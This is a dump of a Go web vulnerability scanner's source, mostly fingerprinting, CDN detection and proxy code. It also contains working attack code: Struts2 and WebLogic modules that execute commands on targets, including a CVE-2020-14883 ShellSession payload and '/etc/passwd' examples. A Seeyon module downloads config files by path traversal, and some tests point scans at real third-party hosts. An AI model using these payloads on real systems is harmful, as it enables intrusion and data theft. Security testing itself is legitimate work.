| "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type PythonPlugin struct{} 14 | 15 | func (p PythonPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | if v, ok := headers["Server"]; ok { 17 | if strings.Contains(strings.Join(v, ""), "Python") { 18 | return true 19 | } 20 | } 21 | return false 22 | } 23 | 24 | func (p PythonPlugin) Name() string { 25 | return "Python" 26 | } 27 | -------------------------------------------------------------------------------- /fingprints/programing/Ruby.go: -------------------------------------------------------------------------------- 1 | package programing 2 | 3 | import ( 4 | regexp "github.com/wasilibs/go-re2" 5 | "strings" 6 | ) 7 | 8 | /** 9 | @author yhy 10 | @since 2023/10/13 11 | @desc //TODO 12 | **/ 13 | 14 | type RubyPlugin struct{} 15 | 16 | func (p RubyPlugin) Fingerprint(body string, headers map[string][]string) bool { 17 | if v, ok := headers["Server"]; ok { 18 | re := regexp.MustCompile(`(?:Mongrel|WEBrick|Ruby)`) 19 | if re.FindStringIndex(strings.Join(v, "")) != nil { 20 | return true 21 | } 22 | } 23 | return false 24 | } 25 | 26 | func (p RubyPlugin) Name() string { 27 | return "Ruby" 28 | } 29 | -------------------------------------------------------------------------------- /fingprints/type.go: -------------------------------------------------------------------------------- 1 | package fingprints 2 | 3 | /** 4 | @author yhy 5 | @since 2023/10/13 6 | @desc //TODO 7 | **/ 8 | 9 | type Plugin interface { 10 | Fingerprint(body string, headers map[string][]string) bool 11 | Name() string 12 | } 13 | -------------------------------------------------------------------------------- /images/image-20231011213912055.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yhy0/Jie/2836308c42e92d9fa20048b9a629322984c56309/images/image-20231011213912055.png -------------------------------------------------------------------------------- /images/image-20240101121809597.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yhy0/Jie/2836308c42e92d9fa20048b9a629322984c56309/images/image-20240101121809597.png -------------------------------------------------------------------------------- /images/image-20240101121931631.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yhy0/Jie/2836308c42e92d9fa20048b9a629322984c56309/images/image-20240101121931631.png -------------------------------------------------------------------------------- /images/image-20240101121957058.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yhy0/Jie/2836308c42e92d9fa20048b9a629322984c56309/images/image-20240101121957058.png -------------------------------------------------------------------------------- /images/passive-scan-client.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yhy0/Jie/2836308c42e92d9fa20048b9a629322984c56309/images/passive-scan-client.png -------------------------------------------------------------------------------- /lib/cdncheck/README.md: -------------------------------------------------------------------------------- 1 | 修改自:https://github.com/projectdiscovery/cdncheck 2 | 增加了国内CDN IP判断,及大部分主流CDN 域名判断、主流云资产识别 3 | 4 | 5 | - Baidu-加速乐 (创宇云盾) 6 | - 网宿 CDN 7 | - 腾讯云CDN 8 | - 阿里云 CDN 9 | - 百度智能云CDN 10 | 11 | 12 | 13 | 如要增加其它CDN或WAF 请更新: 14 | sources_data.json 文件并重新编译 15 | 16 | 17 | 后面仅更新sources_data.json 不再更新Releases,请自行编译 18 | -------------------------------------------------------------------------------- /lib/cdncheck/cdncheck_test.go: -------------------------------------------------------------------------------- 1 | package cdncheck 2 | 3 | import ( 4 | "github.com/stretchr/testify/require" 5 | "net" 6 | "testing" 7 | ) 8 | 9 | func TestCDNCheckValid(t *testing.T) { 10 | client := New() 11 | 12 | found, provider, itemType, err := client.Check(net.ParseIP("173.245.48.12")) 13 | require.Equal(t, "cloudflare", provider, "could not get correct provider") 14 | require.Equal(t, "waf", itemType, "could not get correct item type") 15 | require.Nil(t, err, "Could not check ip in ranger") 16 | require.True(t, found, "Could not check cloudlfare ip blacklist") 17 | 18 | found, _, _, err = client.Check(net.ParseIP("127.0.0.1")) 19 | require.Nil(t, err, "Could not check ip in ranger") 20 | require.False(t, found, "Localhost IP found in blacklist") 21 | } 22 | -------------------------------------------------------------------------------- /lib/cdncheck/generate/options.go: -------------------------------------------------------------------------------- 1 | package generate 2 | 3 | import ( 4 | "net/http" 5 | "os" 6 | ) 7 | 8 | type Options struct { 9 | IPInfoToken string 10 | HTTPClient *http.Client 11 | } 12 | 13 | // HasAuthInfo returns true if auth info has been provided 14 | func (options *Options) HasAuthInfo() bool { 15 | return options.IPInfoToken != "" 16 | } 17 | 18 | // ParseFromEnv parses auth tokens from env or file 19 | func (options *Options) ParseFromEnv() { 20 | if ipInfoToken := os.Getenv("IPINFO_TOKEN"); ipInfoToken != "" { 21 | options.IPInfoToken = ipInfoToken 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /lib/cdncheck/sources_data.go: -------------------------------------------------------------------------------- 1 | package cdncheck 2 | 3 | import ( 4 | _ "embed" 5 | "encoding/json" 6 | "fmt" 7 | ) 8 | 9 | //go:embed sources_data.json 10 | var data string 11 | 12 | var generatedData InputCompiled 13 | 14 | func init() { 15 | if err := json.Unmarshal([]byte(data), &generatedData); err != nil { 16 | panic(fmt.Sprintf("Could not parse cidr data: %s", err)) 17 | } 18 | DefaultCDNProviders = mapKeys(generatedData.CDN) 19 | DefaultWafProviders = mapKeys(generatedData.WAF) 20 | DefaultCloudProviders = mapKeys(generatedData.Cloud) 21 | } 22 | -------------------------------------------------------------------------------- /main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import "github.com/yhy0/Jie/cmd" 4 | 5 | /** 6 | @author: yhy 7 | @since: 2023/1/27 8 | @desc: //TODO 9 | **/ 10 | 11 | func main() { 12 | cmd.Execute() 13 | } 14 | -------------------------------------------------------------------------------- /pkg/mitmproxy/README.md: -------------------------------------------------------------------------------- 1 | ## 被动扫描 2 | 3 | 使用[go-mitmproxy](https://github.com/lqqyt2423/go-mitmproxy) -------------------------------------------------------------------------------- /pkg/mitmproxy/go-mitmproxy/addon/decoder.go: -------------------------------------------------------------------------------- 1 | package addon 2 | 3 | import "github.com/yhy0/Jie/pkg/mitmproxy/go-mitmproxy/proxy" 4 | 5 | // decode content-encoding then respond to client 6 | 7 | type Decoder struct { 8 | proxy.BaseAddon 9 | } 10 | 11 | func (d *Decoder) Response(f *proxy.Flow) { 12 | f.Response.ReplaceToDecodedBody() 13 | } 14 | -------------------------------------------------------------------------------- /pkg/mitmproxy/go-mitmproxy/cert/cert_test.go: -------------------------------------------------------------------------------- 1 | package cert 2 | 3 | import ( 4 | "bytes" 5 | "io/ioutil" 6 | "reflect" 7 | "testing" 8 | ) 9 | 10 | func TestGetStorePath(t *testing.T) { 11 | path, err := getStorePath("") 12 | if err != nil { 13 | t.Fatal(err) 14 | } 15 | if path == "" { 16 | t.Fatal("should have path") 17 | } 18 | } 19 | 20 | func TestNewCA(t *testing.T) { 21 | ca, err := NewCA("") 22 | if err != nil { 23 | t.Fatal(err) 24 | } 25 | 26 | data := make([]byte, 0) 27 | buf := bytes.NewBuffer(data) 28 | 29 | err = ca.saveTo(buf) 30 | if err != nil { 31 | t.Fatal(err) 32 | } 33 | 34 | fileContent, err := ioutil.ReadFile(ca.caFile()) 35 | if err != nil { 36 | t.Fatal(err) 37 | } 38 | 39 | if !reflect.DeepEqual(fileContent, buf.Bytes()) { 40 | t.Fatal("pem content should equal") 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /pkg/mitmproxy/go-mitmproxy/helper/host.go: -------------------------------------------------------------------------------- 1 | package helper 2 | 3 | import "strings" 4 | 5 | // MatchHost detect hosts is match address 6 | func MatchHost(address string, hosts []string) bool { 7 | hostname, port := splitHostPort(address) 8 | for _, host := range hosts { 9 | h, p := splitHostPort(host) 10 | if matchHostname(hostname, h) && (p == "" || p == port) { 11 | return true 12 | } 13 | } 14 | return false 15 | } 16 | 17 | func matchHostname(hostname string, h string) bool { 18 | if h == "*" { 19 | return true 20 | } 21 | if strings.HasPrefix(h, "*.") { 22 | return hostname == h[2:] || strings.HasSuffix(hostname, h[1:]) 23 | } 24 | return h == hostname 25 | } 26 | 27 | func splitHostPort(address string) (string, string) { 28 | index := strings.LastIndex(address, ":") 29 | if index == -1 { 30 | return address, "" 31 | } 32 | return address[:index], address[index+1:] 33 | } 34 | -------------------------------------------------------------------------------- /pkg/mitmproxy/go-mitmproxy/helper/tls.go: -------------------------------------------------------------------------------- 1 | package helper 2 | 3 | import ( 4 | "io" 5 | "os" 6 | "sync" 7 | 8 | log "github.com/sirupsen/logrus" 9 | ) 10 | 11 | // Wireshark 解析 https 设置 12 | var tlsKeyLogWriter io.Writer 13 | var tlsKeyLogOnce sync.Once 14 | 15 | func GetTlsKeyLogWriter() io.Writer { 16 | tlsKeyLogOnce.Do(func() { 17 | logfile := os.Getenv("SSLKEYLOGFILE") 18 | if logfile == "" { 19 | return 20 | } 21 | 22 | writer, err := os.OpenFile(logfile, os.O_WRONLY|os.O_CREATE|os.O_APPEND, 0666) 23 | if err != nil { 24 | log.Debugf("getTlsKeyLogWriter OpenFile error: %v", err) 25 | return 26 | } 27 | 28 | tlsKeyLogWriter = writer 29 | }) 30 | return tlsKeyLogWriter 31 | } 32 | -------------------------------------------------------------------------------- /pkg/mode/passive.go: -------------------------------------------------------------------------------- 1 | package mode 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/mitmproxy" 5 | "github.com/yhy0/logging" 6 | ) 7 | 8 | /** 9 | @author: yhy 10 | @since: 2023/1/11 11 | @desc: 被动代理数据处理 12 | **/ 13 | 14 | func Passive() { 15 | logging.Logger.Debugln("Start passive traffic monitoring scan") 16 | mitmproxy.NewMitmproxy() 17 | } 18 | -------------------------------------------------------------------------------- /pkg/protocols/httpx/fuzz.go: -------------------------------------------------------------------------------- 1 | package httpx 2 | 3 | /** 4 | @author: yhy 5 | @since: 2023/2/10 6 | @desc: 7 | **/ 8 | 9 | // Fuzz 指定参数进行 fuzz 10 | -------------------------------------------------------------------------------- /pkg/protocols/httpx/proxy.go: -------------------------------------------------------------------------------- 1 | package httpx 2 | 3 | import ( 4 | "errors" 5 | "net/url" 6 | ) 7 | 8 | func ValidateProxyURL(proxy string) (string, error) { 9 | if url, err := url.Parse(proxy); err == nil && isSupportedProtocol(url.Scheme) { 10 | return url.Scheme, nil 11 | } 12 | return "", errors.New("invalid proxy format (It should be http[s]/socks5://[username:password@]host:port)") 13 | } 14 | 15 | // isSupportedProtocol checks given protocols are supported 16 | func isSupportedProtocol(value string) bool { 17 | return value == "http" || value == "https" || value == "socks5" 18 | } 19 | -------------------------------------------------------------------------------- /pkg/util/iconhash.go: -------------------------------------------------------------------------------- 1 | package util 2 | 3 | import ( 4 | "bytes" 5 | "encoding/base64" 6 | "github.com/spaolacci/murmur3" 7 | ) 8 | 9 | // Reference: https://github.com/Becivells/iconhash 10 | 11 | // Mmh3Hash32 计算 mmh3 hash 12 | func Mmh3Hash32(raw []byte) int32 { 13 | var h32 = murmur3.New32() 14 | h32.Write(raw) 15 | return int32(h32.Sum32()) 16 | } 17 | 18 | func Base64Encode(braw []byte) []byte { 19 | bckd := base64.StdEncoding.EncodeToString(braw) 20 | var buffer bytes.Buffer 21 | for i := 0; i < len(bckd); i++ { 22 | ch := bckd[i] 23 | buffer.WriteByte(ch) 24 | if (i+1)%76 == 0 { 25 | buffer.WriteByte('\n') 26 | } 27 | } 28 | buffer.WriteByte('\n') 29 | return buffer.Bytes() 30 | } 31 | -------------------------------------------------------------------------------- /pkg/util/regexp.go: -------------------------------------------------------------------------------- 1 | package util 2 | 3 | import ( 4 | regexp "github.com/wasilibs/go-re2" 5 | ) 6 | 7 | /** 8 | @author: yhy 9 | @since: 2023/2/10 10 | @desc: //TODO 11 | **/ 12 | 13 | func MatchAnyOfRegexp(regexps []string, match string) (bool, string) { 14 | for _, value := range regexps { 15 | regex := regexp.MustCompile(value) 16 | if regex.MatchString(match) { 17 | return true, value 18 | } 19 | } 20 | 21 | return false, "" 22 | } 23 | 24 | func RegexpStr(patterns []string, str string) bool { 25 | for _, pattern := range patterns { 26 | match, err := regexp.MatchString(pattern, str) 27 | if err != nil { 28 | continue 29 | } 30 | if match { 31 | return true 32 | } 33 | } 34 | 35 | return false 36 | } 37 | -------------------------------------------------------------------------------- /scan/PerFile/sql/images/image-20230207205442610.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yhy0/Jie/2836308c42e92d9fa20048b9a629322984c56309/scan/PerFile/sql/images/image-20230207205442610.png -------------------------------------------------------------------------------- /scan/PerFile/sql/sqlmap/type.go: -------------------------------------------------------------------------------- 1 | package sqlmap 2 | 3 | /** 4 | @author yhy 5 | @since 2023/10/27 6 | @desc //TODO 7 | **/ 8 | 9 | // http://127.0.0.1:8775/option/taskid/list 10 | type option struct { 11 | Url string `json:"url"` 12 | Method string `json:"method"` 13 | Headers string `json:"headers"` 14 | Data string `json:"data"` 15 | RandomAgent bool `json:"randomAgent"` 16 | Level int `json:"level"` 17 | Risk int `json:"risk"` 18 | Proxy string `json:"proxy"` 19 | Verbose int `json:"verbose"` 20 | } 21 | -------------------------------------------------------------------------------- /scan/PerFile/xss/xss.go: -------------------------------------------------------------------------------- 1 | package xss 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/input" 5 | "github.com/yhy0/Jie/pkg/protocols/httpx" 6 | "sync" 7 | ) 8 | 9 | /** 10 | @author: yhy 11 | @since: 2023/1/5 12 | @desc: 语义分析、原型链污染、dom 污染点传播分析 13 | **/ 14 | 15 | type Plugin struct { 16 | SeenRequests sync.Map 17 | } 18 | 19 | func (p *Plugin) Scan(target string, path string, in *input.CrawlResult, client *httpx.Client) { 20 | if p.IsScanned(in.UniqueId) { 21 | return 22 | } 23 | Audit(in, client) 24 | // dom 随主动爬虫检测了,默认就会检测 25 | // 原型链污染查找 xss 26 | // Prototype(in.Url) 27 | } 28 | 29 | func (p *Plugin) IsScanned(key string) bool { 30 | if key == "" { 31 | return false 32 | } 33 | if _, ok := p.SeenRequests.Load(key); ok { 34 | return true 35 | } 36 | p.SeenRequests.Store(key, true) 37 | return false 38 | } 39 | 40 | func (p *Plugin) Name() string { 41 | return "xss" 42 | } 43 | -------------------------------------------------------------------------------- /scan/PerFolder/log4j/log4j.go: -------------------------------------------------------------------------------- 1 | package log4j 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/input" 5 | "github.com/yhy0/Jie/pkg/protocols/httpx" 6 | "github.com/yhy0/Jie/scan/Pocs/pocs_go/log4j" 7 | "sync" 8 | ) 9 | 10 | /** 11 | @author: yhy 12 | @since: 2023/12/29 13 | @desc: //TODO 14 | **/ 15 | 16 | type Plugin struct { 17 | SeenRequests sync.Map 18 | } 19 | 20 | func (p *Plugin) Name() string { 21 | return "log4j" 22 | } 23 | 24 | func (p *Plugin) Scan(target string, path string, in *input.CrawlResult, client *httpx.Client) { 25 | if p.IsScanned(in.UniqueId) { 26 | return 27 | } 28 | 29 | log4j.Scan(target, in.Method, in.RequestBody, client) 30 | } 31 | 32 | func (p *Plugin) IsScanned(key string) bool { 33 | if key == "" { 34 | return false 35 | } 36 | if _, ok := p.SeenRequests.Load(key); ok { 37 | return true 38 | } 39 | p.SeenRequests.Store(key, true) 40 | return false 41 | } 42 | -------------------------------------------------------------------------------- /scan/PerFolder/traversal/README.md: -------------------------------------------------------------------------------- 1 | ## 目录遍历 2 | 3 | ### Nginx 4 | 5 | https://labs.hakaioffsec.com/nginx-alias-traversal/ 6 | 7 | https://github.com/vulhub/vulhub/blob/6a142caa19620bffa4cda9989697afd5b4136c87/nginx/insecure-configuration/README.md 8 | -------------------------------------------------------------------------------- /scan/PerFolder/traversal/traversal_test.go: -------------------------------------------------------------------------------- 1 | package traversal 2 | 3 | import ( 4 | "github.com/logrusorgru/aurora" 5 | "github.com/yhy0/Jie/conf" 6 | "github.com/yhy0/Jie/pkg/output" 7 | "github.com/yhy0/logging" 8 | "testing" 9 | ) 10 | 11 | /** 12 | @author yhy 13 | @since 2023/8/15 14 | @desc //TODO 15 | **/ 16 | 17 | func TestTraversal(t *testing.T) { 18 | logging.Logger = logging.New(true, "", "agent", false) 19 | conf.GlobalConfig = &conf.Config{} 20 | conf.GlobalConfig.Http.Proxy = "" 21 | 22 | // 获取扫描结果 23 | go func() { 24 | for v := range output.OutChannel { 25 | logging.Logger.Infoln(aurora.Red(v.PrintScreen()).String()) 26 | } 27 | }() 28 | 29 | NginxAlias("https://md.huodong.baidu.com/", "", "") 30 | } 31 | -------------------------------------------------------------------------------- /scan/Pocs/apollo/apollo_test.go: -------------------------------------------------------------------------------- 1 | package apollo 2 | 3 | import ( 4 | "github.com/yhy0/Jie/conf" 5 | "github.com/yhy0/logging" 6 | "testing" 7 | ) 8 | 9 | func TestApollo(t *testing.T) { 10 | logging.Logger = logging.New(true, "", "agent", true) 11 | conf.GlobalConfig = &conf.Config{} 12 | conf.GlobalConfig.Http.Proxy = "http://127.0.0.1:8080" 13 | 14 | Run("http://172.16.39.132:8091", "http://172.16.39.132:8089") 15 | } 16 | -------------------------------------------------------------------------------- /scan/Pocs/java/struts2/README.md: -------------------------------------------------------------------------------- 1 | ## struts2 扫描和利用 2 | 3 | https://github.com/xfiftyone/STS2G 4 | -------------------------------------------------------------------------------- /scan/Pocs/java/struts2/s2-005/s2-005.go: -------------------------------------------------------------------------------- 1 | package s2_005 2 | 3 | import ( 4 | "fmt" 5 | "github.com/fatih/color" 6 | "github.com/yhy0/Jie/scan/Pocs/java/struts2/utils" 7 | "log" 8 | "net/url" 9 | "strings" 10 | ) 11 | 12 | func Check(targetUrl string) { 13 | respString := utils.GetFunc4Struts2(targetUrl, "", utils.POC_s005_check) 14 | if utils.IfContainsStr(respString, utils.Checkflag) { 15 | color.Red("*Found Struts2-005!") 16 | } else { 17 | fmt.Println("Struts2-005 Not Vulnerable.") 18 | } 19 | } 20 | func GetWebPath(targetUrl string) { 21 | respString := utils.GetFunc4Struts2(targetUrl, "", utils.POC_s005_webpath) 22 | log.Println(respString) 23 | } 24 | 25 | func ExecCommand(targetUrl string, command string) { 26 | respString := utils.GetFunc4Struts2(targetUrl, "", utils.POC_s005_exec(command)) 27 | tmpResult := strings.Replace(url.QueryEscape(respString), "%00", "", -1) 28 | fmt.Println(url.QueryUnescape(tmpResult)) 29 | } 30 | -------------------------------------------------------------------------------- /scan/Pocs/java/struts2/s2-007/s2-007.go: -------------------------------------------------------------------------------- 1 | package s2_007 2 | 3 | import ( 4 | "fmt" 5 | "github.com/fatih/color" 6 | "github.com/yhy0/Jie/scan/Pocs/java/struts2/utils" 7 | ) 8 | 9 | func Check(targeturl string, postData string) { 10 | respString := utils.PostFunc4Struts2(targeturl, postData, "", utils.POC_s007_check) 11 | if utils.IfContainsStr(respString, "6308") { 12 | color.Red("*Found Struts2-007!") 13 | } else { 14 | fmt.Println("Struts2-007 Not Vulnerable.") 15 | } 16 | 17 | } 18 | func ExecCommand(targeturl string, command string, postData string) { 19 | respString := utils.PostFunc4Struts2(targeturl, postData, "", utils.POC_s007_exec(command)) 20 | cmdout := utils.GetBetweenStr(respString, "s007execstart", "s007execend")[13:] 21 | fmt.Println(cmdout) 22 | } 23 | -------------------------------------------------------------------------------- /scan/Pocs/java/struts2/s2-008/s2-008.go: -------------------------------------------------------------------------------- 1 | package s2_008 2 | 3 | import ( 4 | "fmt" 5 | "github.com/fatih/color" 6 | "github.com/yhy0/Jie/scan/Pocs/java/struts2/utils" 7 | ) 8 | 9 | func Check(targetUrl string) { 10 | respString := utils.GetFunc4Struts2(targetUrl, "", utils.POC_s008_check) 11 | if utils.IfContainsStr(respString, utils.Checkflag) { 12 | color.Red("*Found Struts2-008!") 13 | } else { 14 | fmt.Println("Struts2-008 Not Vulnerable.") 15 | } 16 | } 17 | func ExecCommand(targetUrl string, command string) { 18 | respString := utils.GetFunc4Struts2(targetUrl, "", utils.POC_s008_exec(command)) 19 | fmt.Println(respString) 20 | } 21 | -------------------------------------------------------------------------------- /scan/Pocs/java/struts2/s2-013/s2-013.go: -------------------------------------------------------------------------------- 1 | package s2_013 2 | 3 | import ( 4 | "fmt" 5 | "github.com/fatih/color" 6 | "github.com/yhy0/Jie/scan/Pocs/java/struts2/utils" 7 | "net/url" 8 | "strings" 9 | ) 10 | 11 | func Check(targetUrl string) { 12 | respString := utils.GetFunc4Struts2(targetUrl, "", utils.POC_s013_check) 13 | if utils.IfContainsStr(respString, "6308") { 14 | color.Red("*Found Struts2-013!") 15 | } else { 16 | fmt.Println("Struts2-013 Not Vulnerable.") 17 | } 18 | } 19 | func ExecCommand(targetUrl string, command string) { 20 | respString := utils.GetFunc4Struts2(targetUrl, "", utils.POC_s013_exec(command)) 21 | respString = strings.Replace(url.QueryEscape(respString), "%00", "", -1) 22 | fmt.Println(url.QueryUnescape(respString)) 23 | } 24 | -------------------------------------------------------------------------------- /scan/Pocs/java/struts2/s2-015/s2-015.go: -------------------------------------------------------------------------------- 1 | package s2_015 2 | 3 | import ( 4 | "fmt" 5 | "github.com/fatih/color" 6 | "github.com/yhy0/Jie/scan/Pocs/java/struts2/utils" 7 | ) 8 | 9 | func Check(targetUrl string) { 10 | respString := utils.GetFunc4Struts2(targetUrl, "", utils.POC_s015_check) 11 | if utils.IfContainsStr(respString, "6308") { 12 | color.Red("*Found Struts2-015!") 13 | } else { 14 | fmt.Println("Struts2-015 Not Vulnerable.") 15 | } 16 | } 17 | func ExecCommand(targetUrl string, command string) { 18 | respString := utils.GetFunc4Struts2(targetUrl, "", utils.POC_s015_exec(command)) 19 | execResult := utils.GetBetweenStr(respString, "s015execstart", "s015execend") 20 | fmt.Println(execResult[13:]) 21 | } 22 | -------------------------------------------------------------------------------- /scan/Pocs/java/struts2/s2-045/s2-045.go: -------------------------------------------------------------------------------- 1 | package s2_045 2 | 3 | import ( 4 | "fmt" 5 | "github.com/fatih/color" 6 | "github.com/yhy0/Jie/scan/Pocs/java/struts2/utils" 7 | ) 8 | 9 | /* 10 | ST2SG.exe --url http://192.168.123.128:8080/S2-045/orders --vn 45 --mode exec --cmd "cat /etc/passwd" 11 | */ 12 | func Check(targetUrl string) { 13 | respString := utils.PostFunc4Struts2(targetUrl, "", "qwer", utils.POC_s045_check) 14 | if utils.IfContainsStr(respString, utils.Checkflag) { 15 | color.Red("*Found Struts2-045!") 16 | } else { 17 | fmt.Println("Struts2-045 Not Vulnerable.") 18 | } 19 | } 20 | func GetWebpath(targetUrl string) { 21 | webpath := utils.PostFunc4Struts2(targetUrl, "", "qwer", utils.POC_s045_webpath) 22 | color.Green(webpath) 23 | 24 | } 25 | func ExecCommand(targetUrl string, command string) { 26 | respString := utils.PostFunc4Struts2(targetUrl, "", "qwer", utils.POC_s045_exec(command)) 27 | fmt.Println(respString) 28 | } 29 | -------------------------------------------------------------------------------- /scan/Pocs/java/struts2/s2-053/s2-053.go: -------------------------------------------------------------------------------- 1 | package s2_053 2 | 3 | import ( 4 | "fmt" 5 | "github.com/fatih/color" 6 | "github.com/yhy0/Jie/scan/Pocs/java/struts2/utils" 7 | "net/url" 8 | ) 9 | 10 | /* 11 | ST2SG.exe --url http://192.168.123.128:8080/S2-053/ --vn 53 --data "name=fuckit" --mode exec --cmd "cat /etc/passwd" 12 | */ 13 | 14 | func Check(targetUrl string, postData string) { 15 | respString := utils.PostFunc4Struts2(targetUrl, postData, "", utils.POC_s053_check) 16 | if utils.IfContainsStr(respString, "6308") { 17 | color.Red("*Found Struts2-053!") 18 | } else { 19 | fmt.Println("Struts2-053 Not Vulnerable.") 20 | } 21 | 22 | } 23 | func ExecCommand(targetUrl string, command string, postData string) { 24 | respString := utils.PostFunc4Struts2(targetUrl, postData, "", utils.POC_s053_exec(command)) 25 | execResult := utils.GetBetweenStr(respString, "s053execstart", "s053execend") 26 | fmt.Println(url.QueryUnescape(execResult)) 27 | } 28 | -------------------------------------------------------------------------------- /scan/Pocs/java/weblogic/CVE_2014_4210.go: -------------------------------------------------------------------------------- 1 | package weblogic 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/protocols/httpx" 5 | "github.com/yhy0/logging" 6 | ) 7 | 8 | func CVE_2014_4210(url string, client *httpx.Client) bool { 9 | if req, err := client.Request(url+"/uddiexplorer/SearchPublicRegistries.jsp", "GET", "", nil); err == nil { 10 | if req.StatusCode == 200 { 11 | logging.Logger.Infoln("[Vulnerable] CVE_2014_4210 ", url) 12 | return true 13 | } 14 | } 15 | logging.Logger.Debugln("[Safety] CVE_2014_4210 ", url) 16 | return false 17 | } 18 | -------------------------------------------------------------------------------- /scan/Pocs/java/weblogic/CVE_2018_2894.go: -------------------------------------------------------------------------------- 1 | package weblogic 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/protocols/httpx" 5 | "github.com/yhy0/logging" 6 | ) 7 | 8 | func CVE_2018_2894(url string, client *httpx.Client) bool { 9 | if req, err := client.Request(url+"/ws_utc/begin.do", "GET", "", nil); err == nil { 10 | if req2, err2 := client.Request(url+"/ws_utc/config.do", "GET", "", nil); err2 == nil { 11 | if req.StatusCode == 200 || req2.StatusCode == 200 { 12 | logging.Logger.Infoln("[Vulnerable] CVE_2018_2894 ", url) 13 | return true 14 | } 15 | } 16 | } 17 | logging.Logger.Debugln("[Safety] CVE_2018_2894 ", url) 18 | return false 19 | } 20 | -------------------------------------------------------------------------------- /scan/Pocs/java/weblogic/CVE_2020_14882.go: -------------------------------------------------------------------------------- 1 | package weblogic 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/protocols/httpx" 5 | "github.com/yhy0/logging" 6 | "strings" 7 | ) 8 | 9 | func CVE_2020_14882(url string, client *httpx.Client) bool { 10 | if req, err := client.Request(url+"/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=a", "GET", "", nil); err == nil { 11 | if req.StatusCode == 200 && strings.Contains(req.Body, "/console/dashboard") { 12 | logging.Logger.Infoln("[Vulnerable] CVE_2020_14882 ", url) 13 | return true 14 | } 15 | } 16 | logging.Logger.Debugln("[Safety] CVE_2020_14882 ", url) 17 | return false 18 | } 19 | -------------------------------------------------------------------------------- /scan/Pocs/java/weblogic/CVE_2020_14883.go: -------------------------------------------------------------------------------- 1 | package weblogic 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/protocols/httpx" 5 | "github.com/yhy0/logging" 6 | ) 7 | 8 | func CVE_2020_14883(url string, client *httpx.Client) bool { 9 | if _, err := client.Request(url+"/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27touch%20../../../wlserver/server/lib/consoleapp/webapp/framework/skins/wlsconsole/css/test.txt%27);%22)", "GET", "", nil); err == nil { 10 | if req2, err2 := client.Request(url+"/console/framework/skins/wlsconsole/css/test.txt", "GET", "", nil); err2 == nil { 11 | if req2.StatusCode == 200 { 12 | logging.Logger.Infoln("[Vulnerable] CVE_2020_14883 ", url) 13 | return true 14 | } 15 | } 16 | } 17 | logging.Logger.Debugln("[Safety] CVE_2020_14883 ", url) 18 | return false 19 | } 20 | -------------------------------------------------------------------------------- /scan/Pocs/java/weblogic/CVE_2021_2109.go: -------------------------------------------------------------------------------- 1 | package weblogic 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/protocols/httpx" 5 | "github.com/yhy0/logging" 6 | "strings" 7 | ) 8 | 9 | func CVE_2021_2109(url string, client *httpx.Client) bool { 10 | if req, err := client.Request(url+"/console/css/%252e%252e%252f/consolejndi.portal", "GET", "", nil); err == nil { 11 | if req.StatusCode == 200 && strings.Contains(req.Body, "Weblogic") { 12 | logging.Logger.Infoln("[Vulnerable] CVE_2021_2109 ", url) 13 | return true 14 | } 15 | } 16 | logging.Logger.Debugln("[Safety] CVE_2021_2109 ", url) 17 | return false 18 | } 19 | -------------------------------------------------------------------------------- /scan/Pocs/nuclei/nuclei_test.go: -------------------------------------------------------------------------------- 1 | package nuclei 2 | 3 | import ( 4 | "fmt" 5 | "github.com/logrusorgru/aurora" 6 | "github.com/yhy0/Jie/conf" 7 | "github.com/yhy0/Jie/pkg/output" 8 | "github.com/yhy0/logging" 9 | "testing" 10 | "time" 11 | ) 12 | 13 | /** 14 | @author: yhy 15 | @since: 2023/1/31 16 | @desc: //TODO 17 | **/ 18 | 19 | func TestNuclei(t *testing.T) { 20 | logging.Logger = logging.New(false, "", "1", true) 21 | conf.GlobalConfig = &conf.Config{} 22 | 23 | conf.GlobalConfig.Http.Proxy = "http://127.0.0.1:8080" 24 | // conf.GlobalConfig.WebScan.Poc = []string{"/Users/yhy/Desktop/test.yaml"} 25 | 26 | go func() { 27 | for v := range output.OutChannel { 28 | logging.Logger.Infoln(aurora.Red(v.PrintScreen()).String()) 29 | } 30 | }() 31 | 32 | Scan("https://yarx.koalr.me/", nil) 33 | 34 | fmt.Println("wait ...") 35 | time.Sleep(5 * time.Second) 36 | } 37 | -------------------------------------------------------------------------------- /scan/Pocs/nuclei/update.go: -------------------------------------------------------------------------------- 1 | package nuclei 2 | 3 | /** 4 | @author yhy 5 | @since 2023/6/1 6 | @desc //TODO 7 | **/ 8 | -------------------------------------------------------------------------------- /scan/Pocs/oa/seeyon/CNVD_2020_62422.go: -------------------------------------------------------------------------------- 1 | package seeyon 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/protocols/httpx" 5 | "strings" 6 | ) 7 | 8 | // webmail.do任意文件下载 9 | 10 | func CNVD_2020_62422(u string, client *httpx.Client) bool { 11 | if req, err := client.Request(u+"/seeyon/webmail.do?method=doDownloadAtt&filename=PeiQi.txt&filePath=../conf/datasourceCtp.properties", "GET", "", nil); err == nil { 12 | if req.StatusCode == 200 && strings.Contains(req.Body, "workflow") { 13 | return true 14 | } 15 | } 16 | return false 17 | } 18 | -------------------------------------------------------------------------------- /scan/Pocs/oa/seeyon/CreateMysql.go: 